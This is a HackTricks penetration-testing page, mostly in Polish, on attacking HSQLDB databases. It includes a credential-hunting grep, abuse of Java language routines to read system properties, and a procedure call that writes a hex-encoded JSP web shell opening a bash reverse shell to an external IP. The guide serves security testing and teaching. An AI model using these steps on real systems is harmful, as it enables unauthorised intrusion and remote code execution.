9001 - Pentesting HSQLDB

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Podstawowe informacje

HSQLDB (HyperSQL DataBase) to wiodący system relacyjnej bazy danych SQL napisany w Javie. Oferuje mały, szybki, wielowątkowy i transakcyjny silnik bazy danych z tabelami w pamięci i na dysku oraz obsługuje tryby osadzone i serwerowe.

Domyślny port: 9001

9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)

Informacje

Ustawienia domyślne

Zauważ, że domyślnie ta usługa prawdopodobnie działa w pamięci lub jest powiązana z localhost. Jeśli ją znalazłeś, prawdopodobnie wykorzystałeś inną usługę i szukasz podniesienia uprawnień.

Domyślne dane logowania to zazwyczaj sa z pustym hasłem.

Jeśli wykorzystałeś inną usługę, przeszukaj możliwe dane logowania za pomocą

grep -rP 'jdbc:hsqldb.*password.*' /path/to/search

Note the database name carefully - you’ll need it to connect.

Info Gathering

Connect to the DB instance by downloading HSQLDB and extracting hsqldb/lib/hsqldb.jar. Run the GUI app (eww) using java -jar hsqldb.jar and connect to the instance using the discovered/weak credentials.

Note the connection URL will look something like this for a remote system: jdbc:hsqldb:hsql://ip/DBNAME.

Tricks

Java Language Routines

Możemy wywoływać statyczne metody klasy Java z HSQLDB za pomocą Java Language Routines. Należy pamiętać, że wywoływana klasa musi znajdować się w classpath aplikacji.

JRTs mogą być functions lub procedures. Funkcje mogą być wywoływane za pomocą instrukcji SQL, jeśli metoda Java zwraca jedną lub więcej zmiennych prymitywnych zgodnych z SQL. Są wywoływane za pomocą instrukcji VALUES.

Jeśli metoda Java, którą chcemy wywołać, zwraca void, musimy użyć procedury wywoływanej za pomocą instrukcji CALL.

Reading Java System Properties

Utwórz funkcję:

CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'

Wykonaj funkcję:

VALUES(getsystemproperty('user.name'))

Możesz znaleźć listę właściwości systemowych tutaj.

Zapisz zawartość do pliku

Możesz użyć gadżetu Java com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename znajdującego się w JDK (automatycznie załadowanym do ścieżki klas aplikacji), aby zapisać elementy zakodowane w formacie hex na dysku za pomocą niestandardowej procedury. Zauważ maksymalny rozmiar 1024 bajtów.

Utwórz procedurę:

CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'

Wykonaj procedurę:

call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))

Wsparcie HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

Previous9000 - Pentesting FastCGI Next9042/9160 - Pentesting Cassandra

Last updated 4 months ago